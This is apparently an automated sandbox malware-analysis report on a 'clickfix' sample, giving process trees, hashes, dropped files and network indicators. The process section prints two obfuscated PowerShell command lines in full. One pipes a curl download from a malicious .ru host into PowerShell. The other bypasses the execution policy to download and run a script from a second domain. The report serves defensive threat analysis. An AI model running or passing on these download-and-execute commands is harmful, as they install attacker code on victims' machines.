File name: temp.txt
Full analysis: https://app.any.run/tasks/f22ebae6-e01a-4021-85e9-0297b3893d9c
Verdict: Malicious activity
Analysis date: April 23, 2025, 05:11:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: clickfix
Indicators:
MIME: application/octet-stream
File info: very short file (no magic)
MD5: CFCD208495D565EF66E7DFF9F98764DA
SHA1: B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA256: 5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SSDEEP: 3:V:V

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 4040)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5008)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 5008)
  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 4040)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 4040)
    • Executes script without checking the security policy

      • powershell.exe (PID: 5008)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 4040)
  • INFO

    • Execution of CURL command

      • powershell.exe (PID: 6700)
    • Reads the computer name

      • curl.exe (PID: 6724)
    • Checks supported languages

      • curl.exe (PID: 6724)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4040)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 4040)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 5008)
    • Disables trace logs

      • powershell.exe (PID: 5008)
    • Checks proxy server information

      • powershell.exe (PID: 5008)
      • slui.exe (PID: 680)
    • Reads the software policy settings

      • slui.exe (PID: 4164)
      • slui.exe (PID: 680)
No Malware configuration.
No data.
Total processes: 138
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 1


Process information

PID: 680
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2516
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 4040
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 4164
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 5008
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C SI Variable:/sM 'https://mt.dybep.fun/gna2_runner';SV l2 (((([Net.WebClient]::New()|Member)|Where{(Variable _).Value.Name -clike'*wn*d*g'}).Name));Set-Item Variable:2 ([Net.WebClient]::New());&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{(Variable _).Value.Name -clike'*d'}).Name)($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where{(Variable _).Value.Name -clike'*Com*e'}).Name)('*e-*press*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(Variable 2 -Valu).((GCI Variable:\l2).Value)((Get-Variable sM -ValueOnl))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 6032
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6700
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w Minimized -c cUr"L.E"x"E" -k -L --"re"try 9"9"9 http"s://hast"i"ly"bak"es"h"o"p.ru"/"1"3"0"6"5"3"65"f"51d"88a4"fb0c0d"ab"4e"9d"f858.txt | pow"e"rs"h"el"l" -;" This Node Is Yours : 2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6724
CMD: "C:\WINDOWS\system32\curl.exe" -k -L --retry 999 https://hastilybakeshop.ru/13065365f51d88a4fb0c0dab4e9df858.txt
Path: C:\Windows\System32\curl.exe
Parent process: powershell.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 7084
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 17 837
Read events: 17 837
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 5
Text files: 8
Unknown types: 0

Dropped files

PID: 6700, Process: powershell.exe, Type: binary
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5: E44F9E8F6D302663F7C9456514FEFD25
SHA256: DCDCAD52AEF15224EC5E1238B8CEC75328C0B64CB5E0DDB329938392B624E053

PID: 6700, Process: powershell.exe, Type: binary
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1XRQO5BCW92U1CVXA68.temp
MD5: E44F9E8F6D302663F7C9456514FEFD25
SHA256: DCDCAD52AEF15224EC5E1238B8CEC75328C0B64CB5E0DDB329938392B624E053

PID: 6700, Process: powershell.exe, Type: binary
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10b538.TMP
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670

PID: 6700, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fsbq1mzh.iul.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4040, Process: powershell.exe, Type: binary
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
MD5: 39059463D54F4508B1654E78002F0416
SHA256: 3ABE4BFBD32A1AC36B41A7DE6D228889514DD3FB86A1CA89AFA817B8853144ED

PID: 6700, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tvu00law.die.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4040, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kar3jta1.las.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6700, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jq04if0d.3gg.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5008, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yizvcwdl.vz4.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4040, Process: powershell.exe, Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wpolmsnd.nsf.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 5
TCP/UDP connections: 24
DNS requests: 18
Threats: 1

HTTP requests

PID  Process  Method  HTTP Code  IP  URL  CN  Type  Size  Reputation

5496  MoUsoCoreWorker.exe  GET  200  23.48.23.164:80  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl  unknown  whitelisted
5496  MoUsoCoreWorker.exe  GET  200  2.23.181.156:80  http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl  unknown  whitelisted
6544  svchost.exe  GET  200  2.17.190.73:80  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D  unknown  whitelisted
3156  SIHClient.exe  GET  200  2.23.246.101:80  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl  unknown  whitelisted
3156  SIHClient.exe  GET  200  2.23.246.101:80  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl  unknown  whitelisted

Connections

PID  Process  IP  Domain  ASN  CN  Reputation

4  System  192.168.100.255:137  whitelisted
2104  svchost.exe  51.104.136.2:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
4  System  192.168.100.255:138  whitelisted
(no PID)  (no process)  51.104.136.2:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
5496  MoUsoCoreWorker.exe  23.48.23.164:80  crl.microsoft.com  Akamai International B.V.  DE  whitelisted
5496  MoUsoCoreWorker.exe  2.23.181.156:80  www.microsoft.com  AKAMAI-AS  DE  whitelisted
6724  curl.exe  188.114.96.3:443  hastilybakeshop.ru  CLOUDFLARENET  NL  unknown
2112  svchost.exe  4.231.128.59:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
3216  svchost.exe  172.211.123.249:443  client.wns.windows.com  MICROSOFT-CORP-MSN-AS-BLOCK  FR  whitelisted
6544  svchost.exe  40.126.32.138:443  login.live.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 172.217.16.206
whitelisted
crl.microsoft.com
  • 23.48.23.164
  • 23.48.23.147
  • 23.48.23.177
  • 23.48.23.194
  • 23.48.23.176
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 2.23.246.101
whitelisted
hastilybakeshop.ru
  • 188.114.96.3
  • 188.114.97.3
unknown
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.32.138
  • 40.126.32.136
  • 20.190.160.17
  • 20.190.160.14
  • 20.190.160.64
  • 20.190.160.22
  • 20.190.160.2
  • 40.126.32.133
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
mt.dybep.fun
  • 172.67.219.133
  • 104.21.45.223
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID: 2196
Process: svchost.exe
Class: A Network Trojan was detected
Message: MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (hastilybakeshop .ru)
No debug info